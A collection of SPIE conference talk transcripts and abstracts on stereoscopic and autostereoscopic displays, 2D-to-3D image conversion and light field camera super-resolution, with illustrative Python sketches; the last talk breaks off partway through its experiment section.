geometry a miracle occurs and we solve for the distance Z. And then we can also get the distances x and y similarly. So we do that for a number of points and we can get the position, the coordinates x, y, and z, for any target, not just your eyes. That just gives you x, y, and z. Now what do we do about the yaw, pitch, and roll? We take advantage of the fact that any three non-collinear points determine a unique plane. And we measure three points of any object with respect to some reference point, let's say the upper right hand corner of this picture. And what we get is a rotation matrix that relates exactly the plane of those three points to our origin. And that gives us the yaw, pitch, and roll. The system that we use works this way. We have retroreflectors that are located right on the glasses, because we have to wear glasses anyway. We illuminate the reflectors with infrared LEDs, and then we look at the reflections through an infrared camera built into the bezel. And then we do some post-processing with triangulation and we get the positions properly.
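As a rough sketch of the two tracking steps just described, triangulating a point from two cameras a known distance apart and recovering orientation from three non-collinear markers, here is a simplified version in Python (NumPy). It assumes idealized cameras that directly report viewing angles and noiseless marker positions, which is only the textbook geometry, not how the actual product is calibrated.

import numpy as np

# Step 1: triangulate a point seen by two cameras separated by a known
# distance D along the x-axis, each reporting the angle to the target
# measured from its own optical axis (both axes parallel to z).
def triangulate(alpha, beta, D):
    z = D / (np.tan(alpha) + np.tan(beta))   # from tan(alpha) = x/z and tan(beta) = (D - x)/z
    return z * np.tan(alpha), z              # (x, z)

x, z = triangulate(np.radians(35), np.radians(32), D=0.40)
print(f"target at x = {x:.3f} m, z = {z:.3f} m")

# Step 2: recover the orientation of a rigid target (e.g. the glasses) from
# three non-collinear markers: build an orthonormal frame from the three
# points and compare it with the frame measured in a reference pose.
def frame_from_points(p0, p1, p2):
    u = p1 - p0
    w = np.cross(u, p2 - p0)                 # normal of the plane through the markers
    v = np.cross(w, u)
    return np.column_stack([a / np.linalg.norm(a) for a in (u, v, w)])

def relative_rotation(ref_pts, cur_pts):
    """Rotation matrix taking the reference marker frame to the current one."""
    return frame_from_points(*cur_pts) @ frame_from_points(*ref_pts).T

# Toy example: three markers on the glasses, rotated 10 degrees about the vertical axis.
ref = [np.array(p, float) for p in [(0, 0, 0), (0.14, 0, 0), (0.07, 0.03, 0)]]
c, s = np.cos(np.radians(10)), np.sin(np.radians(10))
Ry = np.array([[c, 0, s], [0, 1, 0], [-s, 0, c]])
cur = [Ry @ p for p in ref]
R = relative_rotation(ref, cur)
print(f"recovered yaw: {np.degrees(np.arctan2(R[0, 2], R[2, 2])):.1f} degrees")   # ~10.0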
Just as an idea of what happens when you combine head tracking with real-time rendering: this is what happens when you don't have any motion parallax, and this is what happens when you have motion parallax. Even in the absence of stereo, this is incredibly immersive. It gives you a sense of depth that you just can't get anywhere else. So that's the first thing: tracking of the glasses gives us motion parallax. Now I mentioned that you can also use a unique stylus to pick up and rotate and manipulate the objects. How do we track this stylus? Well, we do it partly also with optics. We're also looking at the front and back tips of the stylus. But the stylus has to be very accurate. For proprioception to work, every millimeter you move, every tenth of a degree you twist, has to be detected. In order to get that kind of rotational accuracy, we also have to track using rotational MEMS sensors. So we put a gyroscope and an accelerometer into the stylus. And we measure the angle of rotation as well as the direction of gravity to resolve any ambiguities. And we fuse that together, with some Kalman filtering, with the optical tracking. We get an incredibly accurate six degree of freedom tracking of the stylus. I'll give you a quick idea, by using a video, of what that can give you. So here we can pick up a heart, twist it one for one. I move one millimeter with my hand and the heart moves one millimeter. I twist it. The stylus also has multiple buttons, so I can use different buttons to, say, turn parts of the heart transparent. I can also choose a different tool. In this case I choose a 3D spline tool where I sort of build a 3D, I don't know, a roller coaster you might say. And wherever my hand moves, I can drop a dot. Now you combine that 3D manipulation with motion parallax and I swear it feels like you're dealing with a real heart. It's incredibly, incredibly immersive. An application where such a combination of motion parallax and direct manipulation is used is EchoPixel. So this is an actual scan of a 12 year old girl, and that scan has been filtered with some density filters, and you're actually looking at her torso as Beth manipulates it, putting up exactly the right view you want. And then she can pick up the slice. The slice plane can be moved in any way you want, in any orientation, in any position. So that's an example of the power of direct manipulation and the power of proprioception in conveying a sense of realism. So my time is almost up, so let me give you my conclusions. I presented a stereoscopic system, and I stress the word system. It's not just a 3D display. We talked about the segmented backlight, which minimizes ghosting for stereoscopy. We talked about how optical tracking of the glasses allows you to do motion parallax in all three dimensions. Optical and inertial tracking of the stylus then gives you direct manipulation of the object. And really compelling software that creates imaging, medical imaging, education, simulation, computer-aided design, all sorts of applications that sit on top of this platform. And so a combination of these optical, inertial, cognitive and perceptual cues then creates an incredibly immersive user experience. It's lifelike, realistic and very, very interactive. So that's our zSpace system and, as Greg mentioned, I will bring a system tomorrow afternoon. So come to the demo session in ballroom 4 and you can play with it yourself and hopefully we will elicit a wow from you. Thank you for your time.
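The stylus fusion described above uses Kalman filtering; as a simplified stand-in that captures the same idea, here is a complementary-filter sketch in Python (NumPy), with made-up signal values: integrate the fast but drifting gyro rate, and keep pulling the estimate back toward the slower, absolute optical measurement.

import numpy as np

def fuse_yaw(gyro_rate, optical_yaw, dt=0.005, blend=0.02):
    """Complementary filter: gyro_rate in deg/s, optical_yaw in deg (absolute)."""
    yaw = optical_yaw[0]
    fused = []
    for rate, opt in zip(gyro_rate, optical_yaw):
        yaw += rate * dt                        # fast path: integrate the gyro
        yaw = (1 - blend) * yaw + blend * opt   # slow path: correct drift with the optical fix
        fused.append(yaw)
    return np.array(fused)

dt = 0.005
t = np.arange(0, 2, dt)
true_yaw = 20 * np.sin(t)                                 # the twist the user actually makes
gyro = np.gradient(true_yaw, dt) + 1.5                    # rate measurement with a constant bias
optical = true_yaw + np.random.normal(0, 0.3, t.size)     # absolute but noisier optical estimate

fused = fuse_yaw(gyro, optical, dt)
gyro_only = true_yaw[0] + np.cumsum(gyro * dt)            # dead reckoning from the gyro alone
print(f"final error, gyro only: {abs(gyro_only[-1] - true_yaw[-1]):.2f} deg, "
      f"fused: {abs(fused[-1] - true_yaw[-1]):.2f} deg")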
|
We present a description of a time sequential stereoscopic display which separates the images using a segmented polarization switch and passive eyewear. Additionally, integrated tracking cameras and an SDK on the host PC allow us to implement motion parallax in real time. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32363 (DOI)
|
Thank you Mr. Chairman. My name is Ken Shirevayach from Tokyo University of Agriculture and Technology. The title of my talk is Frameless Multi-View Display Modules Employing Flat Panel Displays for a Large Screen Autostereoscopic Display. A large screen autostereoscopic display provides viewers with a great impression and life-size realistic communication. What do we need to achieve this purpose? We need a more than 100-inch screen, glasses-free viewing, support for multiple viewers, easy installation and relocation, and no need of a darkroom. The multi-projection system has been most commonly used to construct a large screen autostereoscopic display. NICT constructed a system having a screen size of 200 inches; the projection length was 8.0 meters. Holografika commercialized a system having a 140-inch screen; the projection length was 5.6 meters. Samsung developed a system having a 100-inch screen; the projection length was 3.4 meters. In order to obtain a large screen size, the multi-projection system requires a long projection length, thus a large operating space is required. The tiling of multi-view displays has been proposed for the construction of large screens. Because each display has a small screen, the tiling system does not have a large projection length, so the tiling system depth is much shorter than that of the multi-projection system. Moreover, this system can be configured in various ways, such as landscape, portrait, and curved screens. Therefore, it can be used in various applications. In this study, we propose the tiling of frameless multi-view display modules that employ flat panel displays. This slide shows the previous tiling systems that we developed. This is the 3D pixel module that we developed. It was constructed using a 2D array of LCD panels and a 2D array of cylindrical lenses. These 3D pixel modules were two-dimensionally tiled. This is the multi-view display module that we presented last year at this conference. It was composed of a MEMS projector array and a lenticular lens. Each required tiling techniques in order to eliminate the gaps that exist in the tiled screens. This slide shows the Ariscopy Lab system developed by CoveryDiscreed, in which conventional multi-view displays using a parallax barrier were tiled. As you can see, the tiled screen has apparent vertical and horizontal gaps, because each multi-view display has a bezel. Now I'll explain the proposed frameless multi-view display module. The proposed module consists of a multi-view flat panel display, an aperture, an imaging lens, a screen lens, and a vertical diffuser. Two imaging systems exist in this module. In the first imaging system, the imaging lens projects the screen of the multi-view flat panel display onto the screen of the module, which consists of the screen lens and the vertical diffuser. When the magnification is larger than unity, a frameless screen is obtained. The imaging system is designed such that the dimensions of the imaging lens do not exceed the dimensions of the screen of the module. Next, I'll explain the second imaging system. The multi-view flat panel display generates multiple viewpoints. At this position, the aperture is placed to eliminate repeated viewpoints in the horizontal direction. In the second imaging system, the combination of the imaging lens and the screen lens projects the viewpoints of the multi-view flat panel display onto the observation space in order to generate viewpoints for observers. The vertical diffuser increases the vertical viewing area.
Because the repeated viewpoints are eliminated by the aperture, the 3D image does not flip at the boundary of the viewing area. Next, I'll explain the operating principle again using a horizontal sectional view. As I mentioned, two imaging systems exist in the module. In the imaging system for the screen, the imaging lens projects the screen of the multi-view flat panel display onto the screen of the module. In the imaging system for the viewpoints, the combination of the imaging lens and the screen lens projects the viewpoints of the multi-view display onto the viewpoints for the observers. This slide shows the vertical sectional view without the aperture and the vertical diffuser. In this case, the viewing area has sufficient height; however, the off-axis aberrations cause image degradation. With the aperture, the aperture limits the rays in the vertical direction, which helps reduce the image degradation due to off-axis aberrations. However, the height of the viewing area decreases. Finally, with the vertical diffuser, the height of the viewing area increases. When multiple modules are tiled to obtain a large screen size, a common viewing area for all modules must be created. Three possible methods are available. The first method is to properly shift the screen lens in each module. The second is to properly shift the aperture in each module. The third method is to properly rotate each module. These three methods can be used simultaneously. Now, I'll explain the design of the proposed module we constructed. First, I'll explain the multi-view flat panel display. A lenticular lens was designed and attached to the LCD panel to construct the multi-view flat panel display. The lens pitch was 1.482 mm, the slant angle was 0.76 degrees, the focal length was 2.59 mm, and the number of lenses was 320. We used an LCD panel with a screen size of 22.2 inches and a resolution of 3840 x 2400. The constructed multi-view display had a 3D resolution of 320 x 200 and 144 viewpoints. The distance to the viewpoints was 537 mm. The viewing area width was 308 mm. Now I'll explain the imaging system. We used commercial Fresnel lenses because large diameters are required. As you know, Fresnel lenses do not possess ideal imaging properties. I decided to construct the imaging system by using two Fresnel lenses to decrease the distortion and the imaging system length. The focal length of the lenses was 592 mm. In this imaging system, the magnification was 1.23, so the screen size of the module was 27.3 inches. The imaging system length was 1.49 meters. Next, this slide explains the viewpoint generation. We also used a commercial Fresnel lens as the screen lens. The measured focal length was 991 mm. The viewpoints were imaged by the left imaging Fresnel lens to generate viewpoints. The combination of the right imaging Fresnel lens and the screen Fresnel lens generates the viewpoints for the observers. The magnification was 8.57 at a distance of 5.79 meters from the screen. The horizontal width of the viewing area at this distance was 2.64 meters. This slide explains the structure of the screen Fresnel lens. To realize the frameless screen, the side surfaces of the screen Fresnel lens had two-step structures. These grooves were used to support the screen Fresnel lens by the side plates of the module. As you can see, the frameless screen was achieved. This is the prototype display module we constructed. The specifications are shown in this table. The screen size was 27.3 inches. The 3D resolution was 320 by 200. The number of views was 144. The distance to the viewpoints was 5.79 meters. The viewing area width was 2.64 meters.
The interval of the viewpoints was 18 mm. The module length was 1.5 meters. A prototype display system with a medium size screen was constructed using four modules, which were vertically aligned to obtain a screen size of 62.4 inches. To generate a common viewing area for all modules, the centers of the screen lenses were shifted in the vertical direction as shown in this figure. The right figure shows the viewing area of the prototype system. Multiple viewers are supported. This photograph shows the developed prototype of the system. A human-size 3D image can be displayed. This photograph shows a generated 3D image captured from the left, center, and right. Proper motion parallax was obtained. Unfortunately, thin gaps were observed at the boundaries between the modules. This was caused by a certain amount of rays actually being vignetted inside the modules because of aberrations. Now, let me show you some videos. As you can see, the 3D image is bright enough to be viewed in the room in the daytime. Next, the 3D image of a girl. As you can see, the 3D image has smooth motion parallax. This is the final video, the 3D image of the space shuttle. Now I conclude my talk. In this study, the tiling of multi-view display modules was proposed to construct large-screen autostereoscopic displays. The constructed modules had a screen size of 27.3 inches and a resolution of 320 by 200. Four modules were aligned vertically to provide a screen size of 62.4 inches for displaying a human-sized object. Thank you for your kind attention.
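To make the first-order optics of the module concrete, here is a minimal sketch in Python using the ideal thin-lens equation, which the Fresnel lenses only approximate. The magnifications and distances are the values quoted in the talk; the single equivalent focal length used for the two-lens imaging stage is an assumption chosen to be consistent with the quoted 1.49 m length and 1.23 magnification, not a number from the talk.

# Ideal thin-lens relation: 1/s_obj + 1/s_img = 1/f.
def image_distance(f, s_obj):
    return 1.0 / (1.0 / f - 1.0 / s_obj)

# Stage 1: the imaging stage magnifies the 22.2-inch multi-view panel onto the
# module screen. For a target magnification m = s_img / s_obj, the object
# distance is s_obj = f * (m + 1) / m.
f_imaging = 0.368     # assumed equivalent focal length of the two-Fresnel stage, in metres
m_screen = 1.23
s_obj = f_imaging * (m_screen + 1) / m_screen
s_img = image_distance(f_imaging, s_obj)
print(f"panel to lens: {s_obj:.2f} m, lens to screen: {s_img:.2f} m, "
      f"total: {s_obj + s_img:.2f} m, magnification: {s_img / s_obj:.2f}")

# Stage 2: the screen lens re-images the viewpoints into the observation space.
# With the quoted viewpoint magnification of 8.57, the 308 mm viewing-zone
# width of the panel maps to roughly 8.57 * 0.308 m at the observers' distance.
print(f"viewing area width: about {8.57 * 0.308:.2f} m at 5.79 m")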
|
A large-screen autostereoscopic display enables life-size realistic communication. In this study, we propose the tiling of frameless multi-view display modules employing flat-panel displays. A flat-panel multi-view display and an imaging system with a magnification greater than one are combined to construct a multi-view display module with a frameless screen. The module screen consists of a lens and a vertical diffuser to generate viewpoints in the observation space and to increase the vertical viewing zone. When the modules are tiled, the screen lens should be appropriately shifted to produce a common viewing area for all modules. We designed and constructed the multi-view display modules, which have a screen size of 27.3 in. and a resolution of 320 × 200. The module depth was 1.5 m and the number of viewpoints was 144. The viewpoints were generated with a horizontal interval of 16 mm at a distance of 5.1 m from the screen. Four modules were constructed and aligned in the vertical direction to demonstrate a middle-size screen system. The tiled screen had a screen size of 62.4 in. (589 mm × 1,472 mm). The prototype system can display almost human-size objects. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32364 (DOI)
|
I am Vikram Apeya. I work at the Imaging R&D Lab at Texas Instruments and I will be giving a talk on a paper we wrote about fully automatic 2D to 3D conversion using high level features. So here is a brief introduction of what 2D to 3D conversion is. So if you have a scene that is being viewed by an observer, the left and the right I have two different viewpoints and our brain takes these two viewpoints and fuses them together to give us 3D depth of the scene. So the problem of 2D to 3D conversion is that if you have a 2D image, you would want to create two different viewpoints so that when seen by a viewer using an anaglyph, he can simulate the effect of having a left and a right eye view of the scene and once you have that you create a 3D model of the scene. So this model here is actually taking this image and I just ran it through my algorithm here and created a 3D scene. I will have some more examples later in the talk. So let me quickly jump to the overview of the talk. So the basic 2D to 3D conversion algorithm takes a single 2D image and based on some image features and some local training that we did, we create the image into a pseudo depth map. So we used some low level features like gradient and location. We analyzed a few different features and we narrowed it down to gradient and location being the most suitable one for this task. And then on top of that we add some high level features like faces, sky and foliage trying to detect these in the scene and enforce some more depth cues to make the depth map more realistic. And once we have the depth map, we do a view synthesis which is basically taking the 2D image that you have and creating two different views, the left and the right view, to be presented for a 3D system. So this is like a brief overview of the algorithm and I will go through in little more detail in each of these topics as I go forward. So for training what we did was we took a 3D camera, the Fuji 3D camera. We captured multiple consumer images and we used the segment based adaptive belief propagation method to create depth maps or disparity maps from these images. So the idea is we were trying to create 3D images from still existing consumer 2D images. So we captured 3D images with a consumer camera and we are trying to analyze different kinds of consumer scenes and create 3D for such scenes. So once we have multiple of these training images, we needed to find correlation between the disparity map that we generated in the original image. So for that we classified our training images into three different categories. We basically divided our image into three different regions and we analyzed the amount of gradient in each of these regions. So we are making some assumptions about the scene here. The assumptions are that the more gradients or the more texture there is in an object, the closer to the camera and the ones that are farther away have lesser texture. And the other assumption we are making is that in most consumer images, the object of interest or the things that are closer to the camera are towards the bottom of the scene and the things that are on the top of the scene are actually farther away from the camera. So these are some strong assumptions we are making about the scene but if our scene fits into these assumptions, we are able to create 3D models out of these. So it's also possible to divide your image into multiple different layers depending on if you want to take out this assumption about having objects at the bottom of the scene being closer. 
But for our cases we got sufficient performance with just this kind of classification. Once we have classified our training images into these three categories, we take the average of all the depth maps of the images in each category, so we get three different kinds of depth images. Now, once you have a test image, you again take the same three regions, take the total amount of gradient in each of these regions, and that gives you a ratio of the amount of activity in each region. You take a linear weighted combination of these three depth images and create a scene model. What this does is tailor a new scene model specifically for the scene that you are interested in. For example, if you have a person standing towards the center of the image, that region will have much higher gradient than the other regions, so you get a scene model that is closer to the one where the center has more activity. Depending on how the scene is composed, you can actually create a specific scene model for each scene. These are all based on low-level features, namely gradients. Here is an example of how you would convert a given 2D image into a depth map. I am taking an example of a 2D scene and using the model that I previously described to get a depth map. First, we use a color- and edge-based segmentation algorithm to segment the image into multiple regions. We take the centroid of each of these regions, look back at the scene model that we created for this particular image, and assign a depth to each region. This is the depth map that you get using that scene model. Now, this clearly has a very distinct problem: the face and the body have been given two different depths, because typically human beings wear differently colored clothes, and it is natural for segmentation algorithms to segment the face separately from the body. So we need some higher-level information here. If you create a depth map using this, you will have a shearing effect where the person would be sheared from the neck up and his body would be separate. To overcome this problem, we had to add some high-level features. The high-level feature that we added was face detection. What we do here is basically use a face detection algorithm to detect the face in the scene. Then we use the same segmentation algorithm, but we over-segment the objects in the scene. Now that we have multiple smaller segments, we find all the regions whose centroids lie within this blue box. So we take the face, look at a slightly larger region, and combine all the segments that fall within that region. That gives you a mask of the face. Now that you know where the face lies in the image, you assume that whatever is below the face belongs to the body of the person. You take the depth and enforce the depth of the face to be the same as the body, so that the entire person becomes one contiguous region. This overcomes the problem of shearing human beings from the neck up. And since we are targeting consumer images, this is a very common class of images. The next high-level feature that we considered was for outdoor images where there are sky and foliage in the scene.
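A hedged sketch of the face-driven depth correction described above: segments whose centroids fall inside a slightly enlarged face box are given the depth of the region just below the face. The segmentation labels, the margin value, and the use of OpenCV's stock Haar cascade as the face detector are assumptions for illustration, not the authors' exact pipeline.

```python
import numpy as np
import cv2

def enforce_face_body_depth(depth, labels, face_box, margin=0.2):
    """Give segments whose centroids fall inside an (expanded) face box
    the same depth as the band just below the face, so the head is not
    sheared off the body. 'labels' is an integer segment map from any
    over-segmentation; treat all parameters as illustrative."""
    x, y, w, h = face_box
    # Expand the detected face box slightly, as described in the talk.
    x0, y0 = int(x - margin * w), int(y - margin * h)
    x1, y1 = int(x + (1 + margin) * w), int(y + (1 + margin) * h)

    # Depth of the presumed body: sample a band directly below the face.
    body_band = depth[min(y1, depth.shape[0] - 1):, x:x + w]
    body_depth = np.median(body_band) if body_band.size else np.median(depth)

    out = depth.copy()
    for seg_id in np.unique(labels):
        ys, xs = np.nonzero(labels == seg_id)
        cy, cx = ys.mean(), xs.mean()
        if x0 <= cx <= x1 and y0 <= cy <= y1:
            out[labels == seg_id] = body_depth
    return out

# A face box could come, for example, from OpenCV's bundled Haar cascade:
# face_cascade = cv2.CascadeClassifier(
#     cv2.data.haarcascades + "haarcascade_frontalface_default.xml")
# faces = face_cascade.detectMultiScale(gray_image, 1.1, 5)
```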
In this image here, we use the same low-level features based on gradient and create a depth map. In this case the black regions are closer to the camera and the white regions are farther away, and the map places these particular trees farther away than the sky. So just using low-level features, you are not able to assign these depths correctly. What we did was use scene classification. We figure out which regions in the image are sky, which are foliage, and which are foreground, and we enforce this on the depth map. Now we ensure that the ordering is correct, so that the sky is always the farthest object and the foliage falls between the sky and the foreground. On top of that, we again do the face detection and make sure that the entire person is one contiguous object, and we create a depth map based on that. These are some high-level features; there could be many more high-level features added on top of this depending on the class of images that you are trying to address. So this is basically how we create the depth maps. In the next slide, I will talk about how, once you have a depth map, you create the two different left and right views. For this, we do something called view synthesis. Here is an example of how view synthesis works. You take an image and create the depth map, and to create the left and right images for the 3D image, you have to move objects around based on this depth. If you look here, in the left and the right image these objects have been moved around within the image. But this creates a new problem of holes because of occlusion: since you have moved the objects, you do not know what is behind them. So we need to solve this problem as well before we can present it to the user. There are methods ranging from very basic to much more complicated ones. I will start by discussing a few basic methods, show what their flaws are, and then show the solution that we propose for view synthesis. The first method is a very simple background interpolation. It just takes pixels on one edge of the hole and keeps extrapolating them towards the other end. This makes the assumption that the background of the scene is smooth. If you have a smooth white wall or something very simple, you will get good performance, but if you have edges, like in this case here, you get these kinds of artifacts. And since these artifacts will be different in the left and right image, when you present it as an anaglyph it starts creating a very uncomfortable viewing experience. Here is another very straightforward method, mirroring: you just take the scene on the other side of the hole, mirror it around, and present it to the user. This again has its own artifacts, which become very noticeable in 3D. More commonly, people just use a low-pass filter on the depth map to smooth out all the regions, and this creates much cleaner synthesized left and right views. But it also introduces a lot of geometric distortion. For example, if you look at this particular region here, the pen has been distorted completely because of the smoothing. And the issue is that the left and right images will have two different kinds of distortion, so this again creates a much less pleasing 3D image.
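Before looking at hole filling, here is a minimal sketch of the view-synthesis (DIBR) step itself: pixels are shifted horizontally by a disparity derived from the depth map, which leaves exactly the occlusion holes discussed above. The disparity scaling, the near-is-dark depth convention, and the painter's-order trick are assumptions for illustration.

```python
import numpy as np

def synthesize_view(image, depth, max_disparity=16, direction=+1):
    """Naive DIBR: shift each pixel horizontally by a disparity
    proportional to its closeness to the camera; unfilled pixels are
    returned as a hole mask. 'max_disparity' (in pixels) is an assumed
    rendering parameter, not taken from the paper."""
    h, w = depth.shape
    # Near pixels (small depth value in this convention) get large disparity.
    norm = (depth - depth.min()) / max(depth.ptp(), 1e-9)
    disparity = ((1.0 - norm) * max_disparity).astype(np.int32)

    view = np.zeros_like(image)
    hole = np.ones((h, w), dtype=bool)
    # Paint far pixels first so later (nearer) writes overwrite them.
    order = np.argsort(depth.astype(np.float32), axis=None)[::-1]
    ys, xs = np.unravel_index(order, depth.shape)
    xt = np.clip(xs + direction * disparity[ys, xs], 0, w - 1)
    view[ys, xt] = image[ys, xs]
    hole[ys, xt] = False
    return view, hole  # holes must then be filled (interpolation, warping, ...)
```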
To overcome, or rather to circumvent, this problem, what we propose is to accept that we have to introduce distortions. There is no way around it, because you have holes and you need to fill them somehow. What we propose is to keep the foreground regions, which are what users are most keen on viewing, for example faces, and try to push all the distortion into the background regions. So we keep the foreground regions just as they are, and we take all the warping, or the distortion, and warp the background. In this case you are pre-processing the depth map in such a way that the foreground remains clean, but all the distortion is pushed towards the background. You do see some distortion here, but your pen, which is the foreground and the first thing users will notice, remains clean. That is the basic idea of warping and how you can push the distortion, especially the geometric distortion, into the background, where it is not very noticeable to the user. With that, those are the main steps, and here I am just summarizing all the steps that I described so far. We take a 2D image, which is our test image. We do a segmentation into multiple regions, and then based on image cues like gradients and the training data we had, we assign depth values to each of these regions. Then we use some high-level features like face detection and sky and foliage detection to enforce the depth and make it a much cleaner depth map. Once we have the depth map, we use the warping method to get a cleaner pre-processed depth map, and then we create the two different views. In the next few slides, I have some examples of 3D images, if you have some glasses. I have never tested this on the projector; hopefully these look fine here. These are some examples of the depth maps that we created for these scenes, and these are the 3D images. Here are some more examples. When I started working on this project, I got a lot of requests from people to convert their existing 2D images to 3D. This was a friend of mine who asked me to create a 3D image of his daughter's picture. This is my co-author, Umit; this is a picture of him as we were discussing how faces get segmented independently from the body. Here are some more examples, and this is the example of the image that I showed earlier. So that concludes my talk. What we did here was add some amount of high-level information, and there are many different ways of incorporating higher-level information. So this is not a complete solution to 2D to 3D conversion, but a step towards adding more features into our 2D to 3D conversion and getting 3D images from existing 2D images. With that, I conclude my talk.
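The exact warping used in the paper is not given in the transcript; as a rough approximation of the idea of keeping the foreground clean and pushing distortion into the background, one could pre-process the depth map by smoothing it only outside a foreground mask, for example:

```python
import numpy as np
import cv2

def background_weighted_smoothing(depth, foreground_mask, ksize=41):
    """Pre-process the depth map so that hole-induced distortions land in
    the background: keep depth untouched where 'foreground_mask' is set
    (e.g. detected faces or near objects) and heavily smooth it elsewhere.
    This is only an approximation of the warping idea in the talk; the
    kernel size is an illustrative value."""
    smoothed = cv2.GaussianBlur(depth.astype(np.float32), (ksize, ksize), 0)
    return np.where(foreground_mask, depth.astype(np.float32), smoothed)
```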
|
With the recent advent in 3D display technology, there is an increasing need for conversion of existing 2D content into rendered 3D views. We propose a fully automatic 2D to 3D conversion algorithm that assigns relative depth values to the various objects in a given 2D image/scene and generates two different views (stereo pair) using a Depth Image Based Rendering (DIBR) algorithm for 3D displays. The algorithm described in this paper creates a scene model for each image based on certain low-level features like texture, gradient and pixel location and estimates a pseudo depth map. Since the capture environment is unknown, using low-level features alone creates inaccuracies in the depth map. Using such flawed depth map for 3D rendering will result in various artifacts, causing an unpleasant viewing experience. The proposed algorithm also uses certain high-level image features to overcome these imperfections and generates an enhanced depth map for improved viewing experience. Finally, we show several 3D results generated with our algorithm in the results section. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32368 (DOI)
|
Thank you, Mr. Chairman. My name is Kazuki Ohashi. I am a master's student at Nagoya University. Today I will be talking about joint estimation of high resolution images and depth maps from light field cameras. First, I am going to give an overview of our research. On the left is a raw image captured by a light field camera; the top left of this image is shown close up. As you can see here, the raw image has a special structure. Multiple sub-aperture images are produced from the raw image, and these are low resolution. Thus, in our research, high resolution images are produced from the multiple sub-aperture images. Then let me explain what light field cameras are. Light field cameras attract much attention as tools for acquiring 3D information of a scene through a single camera. In a light field camera, a microlens array is inserted between the sensor and the main lens. This structure enables some applications. Some light field cameras are commercially available, such as the Lytro. The applications of the Lytro are digital refocusing and free viewpoint image synthesis. Let me show these applications. In digital refocusing, we focus on the point which we click. In free viewpoint image synthesis, we can see the image from the viewpoint which we choose. Light field cameras are able to capture several views of a scene simultaneously. These images of several views are the sub-aperture images. I will explain how to convert a raw image to sub-aperture images. This is a raw image captured by a light field camera, with one microlens shown close up. There are multiple pixels behind each microlens. Sub-aperture images are formed by extracting the pixel at the same position from each microlens and arranging all of them. For example, this sub-aperture image is formed by gathering the pixels at position 1; then the pixels at position 2 are gathered; then the pixels at position 3 are gathered. The left image is a raw image of a light field camera, and the right image shows the arranged sub-aperture images. As shown in these images, sub-aperture images can be regarded as a set of rectangular images whose viewpoints are arranged on a 2D surface corresponding to the aperture of the light field camera. Thus, sub-aperture images are stereo images. The resolution of the sub-aperture images equals the number of microlenses, because the pixels of a sub-aperture image are arranged by extracting one pixel from each microlens. In light field cameras, the number of microlenses corresponds to the position resolution and the number of pixels behind each microlens corresponds to the angular resolution. Thus the angular resolution and the position resolution trade off under the fixed resolution of the image sensor. So the resolution of the sub-aperture images is low; for example, in our case, the resolution is 325 by 377. This is the main drawback of light field cameras. Super-resolution is a technique that enhances the resolution of images. The flow of super-resolution reconstruction is as follows. First, we register multiple observed images. Secondly, we estimate and optimize the high resolution image by using the registered images. Super-resolution reconstruction is very sensitive to registration error, so accurate registration is necessary. I will explain the purpose of our method. To overcome the low resolution of sub-aperture images, we enhance their resolution by using super-resolution reconstruction. In super-resolution reconstruction, accurate registration is necessary, and this registration is equivalent to depth estimation.
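To make the sub-aperture extraction concrete, here is a small sketch that rearranges an idealized raw lenslet image into its sub-aperture views. It assumes a square lenslet grid aligned with the sensor; real Lytro raw data additionally needs demosaicing and calibration of the (hexagonal) lenslet grid, which is omitted here.

```python
import numpy as np

def extract_subaperture_views(raw, lenslet_size):
    """Rearrange an idealized raw lenslet image of shape
    (H*lenslet_size, W*lenslet_size) into a stack of sub-aperture images
    of shape (lenslet_size, lenslet_size, H, W)."""
    h, w = raw.shape[0] // lenslet_size, raw.shape[1] // lenslet_size
    raw = raw[: h * lenslet_size, : w * lenslet_size]
    # Split every lenslet into its (u, v) pixels: axes become (h, u, w, v).
    blocks = raw.reshape(h, lenslet_size, w, lenslet_size)
    views = blocks.transpose(1, 3, 0, 2)  # (u, v, h, w)
    return views

# views[u, v] is the sub-aperture image seen from aperture position (u, v);
# its resolution equals the number of microlenses (h x w).
```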
And thus we propose a method that jointly estimates high resolution images and depth maps. In our method, we increase the resolution of both the image and the depth map. Here is what we do in the proposed method. First we calculate the initial depth map and the initial high resolution image. The initial depth map is calculated by stereo matching among the sub-aperture images, so the initial depth resolution is limited by the resolution of the sub-aperture images. The initial high resolution image is calculated by bi-cubic interpolation of a sub-aperture image. After that, we perform depth refinement. In the depth refinement, the depth map is optimized and its resolution is increased. Then we perform super-resolution reconstruction, in which the image is optimized and its resolution is increased. As shown here, we perform the depth refinement and the super-resolution reconstruction alternately. In our method, this energy function should be minimized. The energy function represents the squared error between the sub-aperture images and the degraded images generated from the estimated high resolution image. The procedure for minimizing the energy function is as follows. First, give initial values to the high resolution image and the depth map. Then perform depth refinement: with x held fixed, optimize d. Then perform super-resolution reconstruction: with d held fixed, optimize x. Finally, iterate steps two and three until convergence or for a fixed number of times. In our method, the super-resolution reconstruction is implemented by image processing operations. We use the gradient descent method as described in the first and second equations. The matrix A_k is decomposed as described in the third equation, into matrices representing subsampling, motion and blurring. Likewise, the transpose of A_k is decomposed as described in the fourth equation. It is trivial that the operation A_k x can be implemented by image processing operations: the image can be blurred, shifted and subsampled. However, multiplication by the transpose of A_k does not seem to be straightforward. If the transpose of A_k can be implemented by image processing operations, then the whole super-resolution reconstruction can be implemented by image processing operations. Thus we add some assumptions to each matrix decomposed from A_k. The blur matrix B is assumed to be spatially invariant and symmetric. The motion matrix M_k is assumed to represent pixel shifts limited to integer values. Regarding the transpose of B: since B is symmetric, its transpose equals B, so it is implemented by a smoothing filter. Next, the transpose of M_k represents pixel shifts opposite to those of M_k, and the transpose of D represents an upsampling matrix inserting zero elements at regular intervals. All of these can be implemented by image processing operations, so the transpose of A_k, and hence the super-resolution reconstruction, can be implemented by image processing. We perform depth refinement to minimize the energy function. When we optimize the depth d, we change the depth value in a block, compare the pixels of the high resolution image to the corresponding pixels of the sub-aperture images, where the correspondences are given by the depth value, and adopt the value which reduces the difference between the compared pixels. We have conducted an experiment to confirm the effectiveness of our method. We used a Lytro light field camera. The resolution of the raw image is 3280 by 3280, and the resolution of the sub-aperture images is 325 by 377.
